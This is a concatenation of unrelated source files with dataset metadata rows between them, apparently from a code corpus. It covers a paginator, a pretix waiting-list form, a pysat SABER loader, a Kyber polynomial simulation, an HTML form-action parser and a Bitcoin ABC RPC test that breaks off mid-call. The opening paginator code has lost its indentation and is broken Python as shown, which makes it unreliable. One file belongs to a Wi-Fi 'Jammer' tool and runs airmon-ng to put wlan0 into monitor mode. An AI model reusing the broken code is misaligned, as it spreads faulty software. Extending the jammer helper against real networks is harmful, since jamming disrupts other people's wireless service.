       if the index is out of range -> first page; if the list is empty, an empty list is returned
'''
class Paginator:
def __init__(self, list:list, cur_page:int, max_page:int):
self.list = list
self.cur_page = cur_page
self.max_page = max_page
try:
self.items = self.list[self.cur_page-1]
except IndexError:
try:
self.items = self.list[0]
except IndexError:
self.items = []
def __repr__(self):
return f'List with {self.max_page} pages. Current page is {self.cur_page}.'
    '''
    The following class methods simply indicate whether a next page exists and what index it has.
    These methods are used for link generation.
    '''
def next_num(self):
return self.cur_page + 1
def prev_num(self):
return self.cur_page - 1
def has_next(self):
return not self.cur_page >= self.max_page
def has_prev(self):
return not self.cur_page == 1
'''
Function for creating a Paginator object.
The objects in the list are packed into sub-lists of length [max], which are then appended to the super-list.
'''
def paginate(list: list, page: int, max: int):
list = reversed(list)
superlist = []
sublist = []
i = 0
p_i = 0
for entry in list:
        # append the object to the current sub-list
sublist.append(entry)
i += 1
        # once [max] objects are in the sub-list, it is appended to the super-list and the sub-list and counter are reset
        # the page index is incremented
if i == max:
superlist.append(sublist)
sublist = []
i = 0
p_i += 1
    # after the for loop finishes, a partially filled sub-list (if any) is appended
if len(sublist) > 0:
superlist.append(sublist)
p_i += 1
    # return the Paginator object
return Paginator(superlist, page, p_i)
# Function to attach an author object to each post; returns a list of (post, author) tuples
def add_author(posts:list):
matched_posts = []
for post in posts:
author = User.query.filter_by(id=post.user_id).first()
matched_posts.append((post,author))
return matched_posts
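# Usage sketch (illustrative only; `Post` and the attribute names below are assumptions,
# not part of this module):
#   posts = add_author(Post.query.all())
#   page = paginate(posts, 1, 5)
#   for post, author in page.items:
#       print(author.username, post.text)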
| 34.186667
| 134
| 0.642746
|
26c852f701b2b302d7f519e176c388cc572b08ec
| 643
|
py
|
Python
|
Python Scripts/Jammer with CLI Interface/start_adapter.py
|
swalihkdan/YRov
|
415da1b74dc01134eb8ea597466b35ae380b909d
|
[
"MIT"
] | null | null | null |
Python Scripts/Jammer with CLI Interface/start_adapter.py
|
swalihkdan/YRov
|
415da1b74dc01134eb8ea597466b35ae380b909d
|
[
"MIT"
] | null | null | null |
Python Scripts/Jammer with CLI Interface/start_adapter.py
|
swalihkdan/YRov
|
415da1b74dc01134eb8ea597466b35ae380b909d
|
[
"MIT"
] | 1
|
2020-12-08T12:26:34.000Z
|
2020-12-08T12:26:34.000Z
|
import subprocess
import logging
def start_adapter():
#Configuring the logger
logging.basicConfig(filename="./logs/start_adapter.log",
format='%(asctime)s %(message)s',
filemode='w')
#Creating an object
logger=logging.getLogger()
#Setting the threshold of logger to DEBUG
logger.setLevel(logging.DEBUG)
logger.info("Started airmon-ng..................................")
airmon = subprocess.Popen(["airmon-ng","start","wlan0"],stdout = subprocess.PIPE , stderr = subprocess.PIPE)
stdout,stderr = airmon.communicate()
print("Note : Wifi Card is currently in MonitorMode")
| 29.227273
| 109
| 0.643857
|
6bb9e98656853155838637d70ff816e2a5c844d2
| 5,372
|
py
|
Python
|
src/pretix/presale/forms/waitinglist.py
|
pretix/pretix
|
78917afa1a3f0def9d4a67d31df811215708abec
|
[
"Apache-2.0"
] | 1,248
|
2015-04-24T13:32:06.000Z
|
2022-03-29T07:01:36.000Z
|
src/pretix/presale/forms/waitinglist.py
|
pretix/pretix
|
78917afa1a3f0def9d4a67d31df811215708abec
|
[
"Apache-2.0"
] | 2,113
|
2015-02-18T18:58:16.000Z
|
2022-03-31T11:12:32.000Z
|
src/pretix/presale/forms/waitinglist.py
|
pretix/pretix
|
78917afa1a3f0def9d4a67d31df811215708abec
|
[
"Apache-2.0"
] | 453
|
2015-05-13T09:29:06.000Z
|
2022-03-24T13:39:16.000Z
|
#
# This file is part of pretix (Community Edition).
#
# Copyright (C) 2014-2020 Raphael Michel and contributors
# Copyright (C) 2020-2021 rami.io GmbH and contributors
#
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General
# Public License as published by the Free Software Foundation in version 3 of the License.
#
# ADDITIONAL TERMS APPLY: Pursuant to Section 7 of the GNU Affero General Public License, additional terms are
# applicable granting you additional permissions and placing additional restrictions on your usage of this software.
# Please refer to the pretix LICENSE file to obtain the full terms applicable to this work. If you did not receive
# this file, see <https://pretix.eu/about/en/license>.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License along with this program. If not, see
# <https://www.gnu.org/licenses/>.
#
from django import forms
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.utils.translation import gettext_lazy as _
from phonenumber_field.formfields import PhoneNumberField
from phonenumbers.data import _COUNTRY_CODE_TO_REGION_CODE
from pretix.base.forms.questions import (
NamePartsFormField, WrappedPhoneNumberPrefixWidget, guess_country,
)
from pretix.base.i18n import get_babel_locale, language
from pretix.base.models import Quota, WaitingListEntry
from pretix.presale.views.event import get_grouped_items
class WaitingListForm(forms.ModelForm):
required_css_class = 'required'
class Meta:
model = WaitingListEntry
fields = ('name_parts', 'email', 'phone')
def __init__(self, *args, **kwargs):
self.event = kwargs.pop('event')
self.channel = kwargs.pop('channel')
customer = kwargs.pop('customer')
super().__init__(*args, **kwargs)
choices = [
('', '')
]
items, display_add_to_cart = get_grouped_items(
self.event, self.instance.subevent, require_seat=None,
memberships=(
                customer.usable_memberships(
                    for_event=self.instance.subevent or self.event,
                    testmode=self.event.testmode
)
if customer else None
),
)
for i in items:
if not i.allow_waitinglist:
continue
if i.has_variations:
for v in i.available_variations:
if v.cached_availability[0] == Quota.AVAILABILITY_OK:
continue
choices.append((f'{i.pk}-{v.pk}', f'{i.name} – {v.value}'))
else:
if i.cached_availability[0] == Quota.AVAILABILITY_OK:
continue
choices.append((f'{i.pk}', f'{i.name}'))
self.fields['itemvar'] = forms.ChoiceField(
label=_('Product'),
choices=choices,
)
event = self.event
if event.settings.waiting_list_names_asked:
self.fields['name_parts'] = NamePartsFormField(
max_length=255,
required=event.settings.waiting_list_names_required,
scheme=event.settings.name_scheme,
titles=event.settings.name_scheme_titles,
label=_('Name'),
)
else:
del self.fields['name_parts']
if event.settings.waiting_list_phones_asked:
with language(get_babel_locale()):
default_country = guess_country(self.event)
for prefix, values in _COUNTRY_CODE_TO_REGION_CODE.items():
if str(default_country) in values and not self.initial.get('phone'):
# We now exploit an implementation detail in PhoneNumberPrefixWidget to allow us to pass just
# a country code but no number as an initial value. It's a bit hacky, but should be stable for
# the future.
self.initial['phone'] = "+{}.".format(prefix)
self.fields['phone'] = PhoneNumberField(
label=_("Phone number"),
required=event.settings.waiting_list_phones_required,
help_text=event.settings.waiting_list_phones_explanation_text,
widget=WrappedPhoneNumberPrefixWidget()
)
else:
del self.fields['phone']
def clean(self):
try:
iv = self.data.get('itemvar', '')
if '-' in iv:
itemid, varid = iv.split('-')
else:
itemid, varid = iv, None
self.instance.item = self.instance.event.items.get(pk=itemid)
if varid:
self.instance.variation = self.instance.item.variations.get(pk=varid)
else:
self.instance.variation = None
except ObjectDoesNotExist:
raise ValidationError(_("Invalid product selected."))
data = super().clean()
return data
| 40.390977
| 118
| 0.623232
|
2b76fa9f8c014895c61c7680ae490139422a308f
| 3,720
|
py
|
Python
|
pysat/instruments/timed_saber.py
|
scivision/pysat
|
2916ff7c77ad4201c537acca91b7c0b46b542e82
|
[
"BSD-3-Clause"
] | null | null | null |
pysat/instruments/timed_saber.py
|
scivision/pysat
|
2916ff7c77ad4201c537acca91b7c0b46b542e82
|
[
"BSD-3-Clause"
] | null | null | null |
pysat/instruments/timed_saber.py
|
scivision/pysat
|
2916ff7c77ad4201c537acca91b7c0b46b542e82
|
[
"BSD-3-Clause"
] | 1
|
2018-10-26T02:42:50.000Z
|
2018-10-26T02:42:50.000Z
|
# -*- coding: utf-8 -*-
"""Supports the Sounding of the Atmosphere using Broadband Emission Radiometry
(SABER) instrument on the Thermosphere Ionosphere Mesosphere Energetics
Dynamics (TIMED) satellite.
Properties
----------
platform
'timed'
name
'saber'
tag
None supported
sat_id
None supported
Note
----
SABER "Rules of the Road" for DATA USE
Users of SABER data are asked to respect the following guidelines
- Mission scientific and model results are open to all.
- Guest investigators, and other members of the scientific community or
general public should contact the PI or designated team member early in an
analysis project to discuss the appropriate use of the data.
- Users that wish to publish the results derived from SABER data should
normally offer co-authorship to the PI, Associate PI or designated team
members. Co-authorship may be declined. Appropriate acknowledgement of
institutions, personnel, and funding agencies should be given.
- Users should heed the caveats of SABER team members as to the
interpretation and limitations of the data. SABER team members may insist
that such caveats be published, even if co-authorship is declined. Data
and model version numbers should also be specified.
- Pre-prints of publications and conference abstracts should be widely
distributed to interested parties within the mission and related projects.
Warnings
--------
- Note on Temperature Errors: http://saber.gats-inc.com/temp_errors.php
Authors
-------
J. Klenzing, 4 March 2019
"""
from __future__ import print_function
from __future__ import absolute_import
import functools
import pysat
from pysat.instruments.methods import nasa_cdaweb as cdw
from pysat.instruments.methods import general as mm_gen
platform = 'timed'
name = 'saber'
# dictionary of data 'tags' and corresponding description
tags = {'': ''}
sat_ids = {'': ['']}
_test_dates = {'': {'': pysat.datetime(2019, 1, 1)}}
fname = ''.join(('timed_l2av207_saber_{year:04d}{month:02d}{day:02d}',
'????_v01.cdf'))
supported_tags = {'': {'': fname}}
# use the CDAWeb methods list files routine
list_files = functools.partial(mm_gen.list_files,
supported_tags=supported_tags)
# let pysat know that data is spread across more than one file
multi_file_day = True
pandas_format = True
load = cdw.load
basic_tag = {'dir': '/pub/data/timed/saber/level2a_v2_07_cdf',
'remote_fname': '{year:4d}/{month:02d}/' + fname,
'local_fname': fname}
supported_tags = {'': {'': basic_tag}}
download = functools.partial(cdw.download, supported_tags, multi_file_day=True)
# support listing files currently on CDAWeb
list_remote_files = functools.partial(cdw.list_remote_files,
supported_tags=supported_tags)
def clean(inst):
"""Routine to return PLATFORM/NAME data cleaned to the specified level
Cleaning level is specified in inst.clean_level and pysat
will accept user input for several strings. The clean_level is
specified at instantiation of the Instrument object.
'clean' All parameters should be good, suitable for statistical and
case studies
    'dusty' All parameters should generally be good though some may
            not be great
'dirty' There are data areas that have issues, data should be used
with caution
'none' No cleaning applied, routine not called in this case.
Parameters
-----------
inst : pysat.Instrument
Instrument class object, whose attribute clean_level is used to return
the desired level of data selectivity.
"""
return
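# Usage sketch (illustrative only; exact keyword arguments depend on the pysat version):
#   saber = pysat.Instrument(platform='timed', name='saber')
#   saber.download(start=pysat.datetime(2019, 1, 1), stop=pysat.datetime(2019, 1, 2))
#   saber.load(2019, 1)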
| 32.068966
| 80
| 0.709946
|
dc64df24b371fd44a3c6206d960c9c45428445a0
| 4,653
|
py
|
Python
|
python/simulation/kyber/reference/poly.py
|
BayesianSCA/k-trace-CCA
|
8dbf10ff28712848dcb8874e370c3fe40a0566a0
|
[
"Apache-2.0",
"MIT"
] | 1
|
2022-03-14T01:19:56.000Z
|
2022-03-14T01:19:56.000Z
|
python/simulation/kyber/reference/poly.py
|
BayesianSCA/k-trace-CCA
|
8dbf10ff28712848dcb8874e370c3fe40a0566a0
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
python/simulation/kyber/reference/poly.py
|
BayesianSCA/k-trace-CCA
|
8dbf10ff28712848dcb8874e370c3fe40a0566a0
|
[
"Apache-2.0",
"MIT"
] | 1
|
2022-02-03T08:31:21.000Z
|
2022-02-03T08:31:21.000Z
|
import numpy as np
import math
from .ntt import basemul, zetas, ntt, invntt
from .reduce import barrett_reduce
from .params import KYBER_ETA1, KYBER_N
class poly(np.ndarray):
def __new__(cls, height=KYBER_N):
obj = np.zeros(height, dtype=np.int16).view(cls)
return obj
@property
def height(self):
return self.shape[0]
@property
def coeffs(self):
return self
@coeffs.setter
def coeffs(self, val):
self[:] = val
# /*************************************************
# * Name: poly_getnoise_eta1
# *
# * Description: Sample a polynomial deterministically from a seed and a nonce,
# * with output polynomial close to centered binomial distribution
# * with parameter KYBER_ETA1
# *
# * Arguments: - poly *r: pointer to output polynomial
# * - const uint8_t *seed: pointer to input seed
# * (of length KYBER_SYMBYTES bytes)
# * - uint8_t nonce: one-byte input nonce
# **************************************************/
def poly_getnoise_eta1(rng, height):
r = poly_cbd_eta1(rng, height)
return r
# /*************************************************
# * Name: poly_ntt
# *
# * Description: Computes negacyclic number-theoretic transform (NTT) of
# * a polynomial in place;
# * inputs assumed to be in normal order, output in bitreversed order
# *
# * Arguments: - uint16_t *r: pointer to in/output polynomial
# **************************************************/
def poly_ntt(r: poly) -> poly:
r_hat, _ = ntt(r.copy(), r.height, int(math.log2(r.height)) - 1)
r_hat = poly_reduce(r_hat)
return r_hat
def poly_invntt(r_hat: poly) -> poly:
r, _, _ = invntt(r_hat.copy(), r_hat.height, int(math.log2(r_hat.height)) - 1)
return r
# /*************************************************
# * Name: poly_basemul_montgomery
# *
# * Description: Multiplication of two polynomials in NTT domain
# *
# * Arguments: - poly *r: pointer to output polynomial
# * - const poly *a: pointer to first input polynomial
# * - const poly *b: pointer to second input polynomial
# **************************************************/
def poly_basemul_montgomery(a: poly, b: poly) -> poly:
assert a.height == b.height
r = poly(height=a.height)
zeta_offset = (
a.height // 4
) # 64, NOTE: formula should be correct for smaller heights
for i in range(a.height // 4):
r[4 * i : 4 * i + 2] = basemul(
a[4 * i : 4 * i + 2], b[4 * i : 4 * i + 2], zetas[zeta_offset + i]
)
r[4 * i + 2 : 4 * i + 4] = basemul(
a[4 * i + 2 : 4 * i + 4], b[4 * i + 2 : 4 * i + 4], -zetas[zeta_offset + i]
)
return r
# /*************************************************
# * Name: poly_reduce
# *
# * Description: Applies Barrett reduction to all coefficients of a polynomial
# * for details of the Barrett reduction see comments in reduce.c
# *
# * Arguments: - poly *r: pointer to input/output polynomial
# **************************************************/
def poly_reduce(r: poly) -> poly:
return barrett_reduce(r)
# /*************************************************
# * Name: poly_add
# *
# * Description: Add two polynomials; no modular reduction is performed
# *
# * Arguments: - poly *r: pointer to output polynomial
# * - const poly *a: pointer to first input polynomial
# * - const poly *b: pointer to second input polynomial
# **************************************************/
def poly_add(a: poly, b: poly) -> poly:
return a + b
def poly_sub(a: poly, b: poly) -> poly:
return a - b
# /*************************************************
# * Name: cbd2
# *
# * Description: Given an array of uniformly random bytes, compute
# * polynomial with coefficients distributed according to
# * a centered binomial distribution with parameter eta=2
# *
# * Arguments: - poly *r: pointer to output polynomial
# * - const uint8_t *buf: pointer to input byte array
# **************************************************/
def poly_cbd_eta1(rng, height=KYBER_N, KYBER_ETA1=KYBER_ETA1) -> poly:
assert KYBER_ETA1 == 2, "Not Implemented"
# implementing cbd2():
a = rng.integers(0, 2, height, dtype=np.int16)
a += rng.integers(0, 2, height, dtype=np.int16)
b = rng.integers(0, 2, height, dtype=np.int16)
b += rng.integers(0, 2, height, dtype=np.int16)
r = poly(height=height)
r.coeffs = a - b
return r
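# Example sketch (assumes a numpy Generator as the noise source; the module uses relative
# imports, so this is illustrative rather than a runnable __main__ block):
#   rng = np.random.default_rng(0)
#   a, b = poly_getnoise_eta1(rng, KYBER_N), poly_getnoise_eta1(rng, KYBER_N)
#   c_hat = poly_basemul_montgomery(poly_ntt(a), poly_ntt(b))
#   c = poly_invntt(c_hat)  # approximates a*b in the ring, up to Montgomery/scaling factors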
| 33.47482
| 87
| 0.526112
|
2f005a239a1d902db0fa9748b80ece0e67f16247
| 11,390
|
py
|
Python
|
perftrackerlib/browser/httputils.py
|
brusnigin/perftracker-lib
|
648de197aaa301001791764a7ac0a6e731edf74d
|
[
"MIT"
] | null | null | null |
perftrackerlib/browser/httputils.py
|
brusnigin/perftracker-lib
|
648de197aaa301001791764a7ac0a6e731edf74d
|
[
"MIT"
] | null | null | null |
perftrackerlib/browser/httputils.py
|
brusnigin/perftracker-lib
|
648de197aaa301001791764a7ac0a6e731edf74d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
__author__ = "istillc0de@gmail.com"
__copyright__ = "Copyright 2018, The PerfTracker project"
__license__ = "MIT"
import re
import logging
import urllib
import tempfile
import os
import sys
# urlencode/unquote live in different modules on Python 2 and 3
if sys.version_info[0] < 3:
    import urlparse
    import httplib
    from urllib import urlencode, unquote
    from httplib import HTTPResponse
    from BaseHTTPServer import BaseHTTPRequestHandler
    from StringIO import StringIO
    from HTMLParser import HTMLParser
else:
    import urllib.parse as urlparse
    import http.client as httplib
    from urllib.parse import urlencode, unquote
    from http.client import HTTPResponse
    from http.server import BaseHTTPRequestHandler
    from io import StringIO
    from html.parser import HTMLParser
reScriptLocation = re.compile(r"top\.location[\.href]*=\'(.*)\'")
reFormButtonUrl = re.compile(r"doSubmit\(\'(.*)\'")
###############################################################################
# Support classes for HTML page processing and action URLs extraction
#
class TagValueBase(object):
def __init__(self, tag):
self.tag = tag
self.value = None
self.inside = False
def is_processing(self):
return self.inside
class TagValueManual(TagValueBase):
def __init__(self, tag):
TagValueBase.__init__(self, tag)
def begin(self, tag):
if tag == self.tag:
self.inside = True
return True
return False
def end(self, tag):
if tag == self.tag:
self.inside = False
return True
return False
def set_value(self, value):
self.value = value
def clear_value(self):
self.value = None
class Request(object):
def __init__(self, url, method=None, uid=None):
self._params = {} # dict of parameters {name: value} (used by POST only)
self.url = None # URL without host name, e.g. /turbine
self.method = method.upper() if method else 'GET'
self.uid = uid # request ID
if url: # if url is None, Request considered as valid but incomplete
self.reset_url(url)
def reset_url(self, url):
url = urlparse.urlparse(url)
self.url = url.path
if not self.url.startswith('/'):
self.url = '/' + self.url
if self.method == 'POST':
self._params = dict(urlparse.parse_qsl(url.query))
else:
self._params = {}
if url.query:
self.url += '?' + url.query
def add_param(self, name, value):
if self.method == 'POST':
self._params[name] = value
else:
self.url += '&%s=%s' % (name, value)
def get_params(self):
# converts parameters dict into string (n1=v1&n2=v2&...)
        return urlencode(self._params) if self._params else None
def is_complete(self):
return True if self.url else False
def process_action(self, tag, attrs):
if tag == 'button' and attrs.get('type','submit') == 'submit':
match = reFormButtonUrl.search(attrs.get('onclick', ''))
if match:
                url = unquote(match.group(1))
url = HTMLParser().unescape(url)
self.uid = tag + ':' + attrs.get('name', 'none')
self.reset_url(url)
return True
return False
###############################################################################
# Class for HTML page processing (based on HTMLParser template)
#
# The main goal of the class is to gather all possible URLs of actions on the page. After
# that, the user would select one and use it either to build the chain of auto-redirected
# pages or for manual navigation (JFI: list of possible redirection methods
# https://code.google.com/p/html5security/wiki/RedirectionMethods).
#
class PageParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self._body_tag = TagValueManual('body')
self._form_tag = TagValueManual('form')
self._script_tag = TagValueManual('script')
self._noscript_tag = TagValueManual('noscript')
# Objects of Request type (public)
self.forms = []
self.iframe_src = None
self.body_onload = None
self.script = None
self.global_action = None # action outside <form>'s
self.form_auto_submit = False
def handle_starttag(self, tag, attributes):
attrs = {}
for attr in attributes:
attrs[attr[0].lower()] = attr[1]
# <noscript> (there is no any valuable information inside this tag)
if self._noscript_tag.begin(tag) or self._noscript_tag.is_processing():
return
# <script> (only set the flag, script body will be in handle_data())
if self._script_tag.begin(tag):
return
# <iframe> (process 'src' with URL)
if tag == 'iframe':
attr = attrs.get('src')
if attr:
self.iframe_src = Request(attr)
return
# <body> (process 'onload' with script)
if self._body_tag.begin(tag):
attr = attrs.get('onload')
if not attr:
pass
elif "document.forms[0].submit()" in attr:
self.form_auto_submit = True
else:
match = reScriptLocation.search(attr)
if match:
                    url = unquote(match.group(1))
url = HTMLParser().unescape(url)
self.body_onload = Request(url)
self._body_tag.set_value(Request(None, 'POST'))
return
# <form> (initialize the new form object)
if self._form_tag.begin(tag):
form_id = attrs.get('id') or attrs.get('name')
self._form_tag.set_value(Request(attrs.get('action'), attrs.get('method'), form_id))
return
# <form> ... </form> (fill the new form object with parameters)
if self._form_tag.is_processing():
# extract form parameters
if tag == 'input' and attrs.get('type') in ['hidden', 'text', 'password'] and attrs.get('name'):
self._form_tag.value.add_param(attrs['name'], attrs.get('value', ''))
# if form has no action attribute, try to use one from the submit button
if not self._form_tag.value.is_complete():
self._form_tag.value.process_action(tag, attrs)
# <body> ... </body> (uhh, get buttons outside <form>)
elif self._body_tag.is_processing():
if not self._body_tag.value.is_complete():
self._body_tag.value.process_action(tag, attrs)
def handle_endtag(self, tag):
# </form> (copy completed form into list)
if self._form_tag.end(tag):
if self._form_tag.value.is_complete():
self.forms.append(self._form_tag.value)
self._form_tag.clear_value()
# </body>
elif self._body_tag.end(tag):
if self._body_tag.value.is_complete():
self.global_action = self._body_tag.value
# </noscript>
elif self._noscript_tag.end(tag):
pass
# </script>
elif self._script_tag.end(tag):
pass
# </html> (finish HTML processing, perform all onexit steps)
elif tag == 'html':
if self._script_tag.value:
match = reScriptLocation.search(self._script_tag.value)
if match:
self.script = Request(match.group(1))
def handle_data(self, data):
# <script> body
if self._script_tag.is_processing():
self._script_tag.set_value(data)
###############################################################################
# Class for retrieving HTML page actions
#
class PageActionsExtractor:
def __init__(self, body):
self.pp = None
self.body = body
try:
self.pp = PageParser()
self.pp.feed(body)
except Exception as ex:
logging.debug("Page not completely processed due to: %s", ex)
logging.debug("see corresponded html in file: %s", log2file(body))
# do not raise here, because it happens quite often on some complex pages
def get_action(self, uid=None):
        # Searches for the action with the specified uid and returns the Request object corresponding to this action.
        # If uid is None, the auto-redirected action is searched for, according to hardcoded rules.
# If no any actions found, None is returned.
#
        # uid -- can be either <form id> or <form button id>; in the latter case, the uid has
        #        the 'button:' prefix (e.g. for button id='login', uid='button:login')
if not self.pp:
return None
if not uid: # looking for auto-redirected request
if self.pp.script:
return self.pp.script
if self.pp.iframe_src:
return self.pp.iframe_src
if self.pp.forms and self.pp.form_auto_submit:
return self.pp.forms[0]
if self.pp.body_onload:
return self.pp.body_onload
else: # Looking for particular request
if self.pp.forms:
for form in self.pp.forms:
if form.uid == uid:
return form
if self.pp.global_action:
if self.pp.global_action.uid == uid:
return self.pp.global_action
return None
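    # Usage sketch (illustrative only):
    #   extractor = PageActionsExtractor(html_body)
    #   auto_req = extractor.get_action()                 # auto-redirected action, if any
    #   login_req = extractor.get_action('button:login')  # action tied to a specific form/button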
###############################################################################
# Helper functions
#
def unescape(s):
s = s.replace("<", "<")
s = s.replace(">", ">")
s = s.replace(""", '"')
s = s.replace("'", "'")
s = s.replace("&", "&")
return s
def log2file(text):
"""
    Pretty simple function, saves the text into a temporary file and returns its name
:param text: string to log
:return: temporary file name
"""
handle, name = tempfile.mkstemp(suffix='.html', prefix='log_', text=True)
os.write(handle, text)
os.close(handle)
return name
class HTTPRequestFromStr(BaseHTTPRequestHandler):
def __init__(self, request_text):
self.rfile = StringIO(request_text)
self.raw_requestline = self.rfile.readline()
self.error_code = self.error_message = None
self.parse_request()
def send_error(self, code, message):
self.error_code = code
self.error_message = message
class HTTPResponseFromStr(HTTPResponse):
def __init__(self, response_text):
try:
self.init(response_text)
except httplib.UnknownProtocol as e:
# FIXME: handle HTTP/2.0 that is 'unknown' for httplib (to check go to www.google.com)
logging.debug(str(e) + " retrying with HTTP/2.0 replaced by HTTP/1.1")
self.init(response_text.replace("HTTP/2.0", "HTTP/1.1"))
def init(self, response_text):
class FakeSocket:
def __init__(self, response_str):
self._file = StringIO(response_str)
def makefile(self, *args, **kwargs):
return self._file
source = FakeSocket(response_text)
HTTPResponse.__init__(self, source)
self.begin()
| 34.204204
| 108
| 0.57489
|
b7a062e6c814c4c6e8a011bc6fbdc165762ba795
| 976
|
py
|
Python
|
swf/models/event/timer.py
|
nstott/simpleflow
|
483602deb745a09b59ad6e24052dd5096c54fad2
|
[
"MIT"
] | null | null | null |
swf/models/event/timer.py
|
nstott/simpleflow
|
483602deb745a09b59ad6e24052dd5096c54fad2
|
[
"MIT"
] | null | null | null |
swf/models/event/timer.py
|
nstott/simpleflow
|
483602deb745a09b59ad6e24052dd5096c54fad2
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
# Copyright (c) 2013, Theo Crevon
# Copyright (c) 2013, Greg Leclercq
#
# See the file LICENSE for copying permission.
from swf.models.event.base import Event
from swf.models.event.compiler import CompiledEvent
class TimerEvent(Event):
_type = 'Timer'
class CompiledTimerEvent(CompiledEvent):
_type = 'Timer'
states = (
'started', # A timer was started for the workflow execution
'start_failed', # Failed to process StartTimer decision
'fired', # A timer, previously started for this workflow execution, fired
'canceled', # A timer, previously started for this workflow execution, was successfully canceled
'cancel_failed', # Failed to process CancelTimer decision
)
transitions = {
'started': ('canceled', 'fired'),
        'start_failed': ('canceled',),
        'fired': ('canceled',),
'canceled': ('cancel_failed', 'fired'),
}
initial_state = 'started'
| 27.111111
| 105
| 0.655738
|
8bf863d6b82169ab1fcece848f4b93149f4f9342
| 6,537
|
py
|
Python
|
test/functional/rpc_generateblock.py
|
WORLDKING2021/bitcoin-abc
|
e98dd8358d9ca5442d80ec8a1596a8c9be486c1a
|
[
"MIT"
] | null | null | null |
test/functional/rpc_generateblock.py
|
WORLDKING2021/bitcoin-abc
|
e98dd8358d9ca5442d80ec8a1596a8c9be486c1a
|
[
"MIT"
] | null | null | null |
test/functional/rpc_generateblock.py
|
WORLDKING2021/bitcoin-abc
|
e98dd8358d9ca5442d80ec8a1596a8c9be486c1a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''Test generateblock rpc.
'''
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
class GenerateBlockTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node = self.nodes[0]
self.log.info('Generate an empty block to address')
address = node.getnewaddress()
hash = node.generateblock(output=address, transactions=[])['hash']
block = node.getblock(blockhash=hash, verbose=2)
assert_equal(len(block['tx']), 1)
assert_equal(block['tx'][0]['vout'][0]
['scriptPubKey']['addresses'][0], address)
self.log.info('Generate an empty block to a descriptor')
hash = node.generateblock('addr(' + address + ')', [])['hash']
block = node.getblock(blockhash=hash, verbosity=2)
assert_equal(len(block['tx']), 1)
assert_equal(block['tx'][0]['vout'][0]
['scriptPubKey']['addresses'][0], address)
self.log.info(
'Generate an empty block to a combo descriptor with compressed pubkey')
combo_key = '0279be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798'
combo_address = 'bchreg:qp63uahgrxged4z5jswyt5dn5v3lzsem6c6mz8vuwd'
hash = node.generateblock('combo(' + combo_key + ')', [])['hash']
block = node.getblock(hash, 2)
assert_equal(len(block['tx']), 1)
assert_equal(block['tx'][0]['vout'][0]['scriptPubKey']
['addresses'][0], combo_address)
self.log.info(
'Generate an empty block to a combo descriptor with uncompressed pubkey')
combo_key = '0408ef68c46d20596cc3f6ddf7c8794f71913add807f1dc55949fa805d764d191c0b7ce6894c126fce0babc6663042f3dde9b0cf76467ea315514e5a6731149c67'
combo_address = 'bchreg:qqmagqc48ln8p7zk6ez2h64amcamr86qwqezwt52uy'
hash = node.generateblock('combo(' + combo_key + ')', [])['hash']
block = node.getblock(hash, 2)
assert_equal(len(block['tx']), 1)
assert_equal(block['tx'][0]['vout'][0]['scriptPubKey']
['addresses'][0], combo_address)
# Generate 110 blocks to spend
node.generatetoaddress(110, address)
# Generate some extra mempool transactions to verify they don't get
# mined
for i in range(10):
node.sendtoaddress(address, 0.001)
self.log.info('Generate block with txid')
txid = node.sendtoaddress(address, 1)
hash = node.generateblock(address, [txid])['hash']
block = node.getblock(hash, 1)
assert_equal(len(block['tx']), 2)
assert_equal(block['tx'][1], txid)
self.log.info('Generate block with raw tx')
utxos = node.listunspent(addresses=[address])
raw = node.createrawtransaction(
[{'txid': utxos[0]['txid'], 'vout':utxos[0]['vout']}], [{address: 1}])
signed_raw = node.signrawtransactionwithwallet(raw)['hex']
hash = node.generateblock(address, [signed_raw])['hash']
block = node.getblock(hash, 1)
assert_equal(len(block['tx']), 2)
txid = block['tx'][1]
assert_equal(node.gettransaction(txid)['hex'], signed_raw)
self.log.info('Fail to generate block with out of order txs')
raw1 = node.createrawtransaction(
[{'txid': txid, 'vout': 0}], [{address: 0.9999}])
signed_raw1 = node.signrawtransactionwithwallet(raw1)['hex']
txid1 = node.sendrawtransaction(signed_raw1)
raw2 = node.createrawtransaction(
[{'txid': txid1, 'vout': 0}], [{address: 0.999}])
signed_raw2 = node.signrawtransactionwithwallet(raw2)['hex']
txid2 = node.sendrawtransaction(signed_raw2)
# Reversed CTOR
txids = sorted([txid1, txid2], reverse=True)
assert_raises_rpc_error(-25,
'TestBlockValidity failed: tx-ordering',
node.generateblock,
address,
txids)
self.log.info('Fail to generate block with txid not in mempool')
missing_txid = '0000000000000000000000000000000000000000000000000000000000000000'
assert_raises_rpc_error(-5,
'Transaction ' + missing_txid + ' not in mempool.',
node.generateblock,
address,
[missing_txid])
self.log.info('Fail to generate block with invalid raw tx')
invalid_raw_tx = '0000'
assert_raises_rpc_error(-22,
'Transaction decode failed for ' + invalid_raw_tx,
node.generateblock,
address,
[invalid_raw_tx])
self.log.info('Fail to generate block with invalid address/descriptor')
assert_raises_rpc_error(-5,
'Invalid address or descriptor',
node.generateblock,
'1234',
[])
self.log.info('Fail to generate block with a ranged descriptor')
ranged_descriptor = 'pkh(tpubD6NzVbkrYhZ4XgiXtGrdW5XDAPFCL9h7we1vwNCpn8tGbBcgfVYjXyhWo4E1xkh56hjod1RhGjxbaTLV3X4FyWuejifB9jusQ46QzG87VKp/0/*)'
assert_raises_rpc_error(
-8,
'Ranged descriptor not accepted. Maybe pass through deriveaddresses first?',
node.generateblock,
ranged_descriptor,
[])
self.log.info(
